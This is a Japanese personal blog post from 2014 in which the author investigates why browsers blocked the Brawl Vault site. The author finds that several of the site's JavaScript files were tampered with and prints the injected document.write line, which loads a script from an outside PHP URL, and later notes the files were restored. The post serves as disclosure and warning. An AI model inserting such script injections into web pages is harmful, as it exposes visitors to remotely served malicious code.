読者です 読者をやめる 読者になる 読者になる

はりをきば

そこにピカマンがいる限り 私はテイッハットウッをやめない


Caution!!
この日記はバカな私(はりを)が何かを忘れない為に、バカの一つ覚えの如く色んな記事を投稿しています。…が、
あくまでもただの備忘録のひと握りに過ぎず、情報の信憑性や真偽までは保証していません。
極力正しい情報をまとめているつもりですが、万一誤った記事の内容を実行しトラブル等が発生しても
当方は如何なる責任を負いません。自己責任でご利用ください。

以上に同意する方のみ、この雑記帳の閲覧をお願いします。

初めての方はこちらも併せてお読みください。このブログについて (About)


…ちゃ、ちゃんと予防線張ったからな!! ホント何があっても知らねーからな!!!(小学生並の言い訳)

予防線(☢Caution!!☢)の表示
テキスト全般の表示に使うフォント (大抵は「メイリオ」か「ヒラギノ角ゴ ProN W3」) (マルチバイト文字はSource Han Sansと同じ) (マルチバイト文字はNoto Sansと同じ)
ソースコードの表示に使うフォント
ピカマンロケットの効果音

設定を保存キャンセル

Brawl Vaultがウイルス感染?

追記
2014/01/18、改ざんされたファイル全てが元通りに修正されているのを確認。
もうアクセスしても心配なさそうです。


先程メインで使ってるFirefoxでBVを見てたら、いきなりこんな物騒な画面が出てアクセスブロックされた。
f:id:Gutyan:20140117005537p:plain


サブで使ってるCoolNovoもこんな感じでブロックされる。
f:id:Gutyan:20140117005639p:plain


ハックロムを快く思わない誰かのいたずら通報か? と思ったけど
そうだと言い切れる自信がないので調べてみた。


とりあえず、CoolNovoのデバッガでアクセスログを取得。
すると…
f:id:Gutyan:20140117010048p:plain


BVの核となるJavaScriptファイルの複数から、
ihrhandwerk.deというドメインにあるファイル名が英数字の羅列のPHPにアクセスしている。

【注意】
この記事を投下した時点ではihrhandwerk.deにアクセスしても何も起こりませんが、
今後何を仕掛けられるかわかったもんじゃないので
興味本位でihrhandwerk.deにアクセスしないでください。


とりあえず適当に1つBVのJSを開いてみたら…。
f:id:Gutyan:20140117010333p:plain


script要素をdocument.writeするコードが
以下のスクリプト全てに挿入されとる。


いずれも、最後に以下のコードが追加されてるっぽい。

/* ランダムな英数字 */
document.write("<script src='http://www.ihrhandwerk.de/qmBrvcg6.php?id=129841940' type='text/javascript'></" + "script>");
/*/ ランダムな英数字 */


人力でこんな意味不なコメントを入れる訳ない。
どう見ても改ざんです本当にありがとうございました。


サーバーが安定しない*1上に今度は改竄ですか。。
コーティングもアレだし、ホントしっかりしてくれよBrawl Vaultさんよぅ…

*1:度重なる403/404/503エラーの数々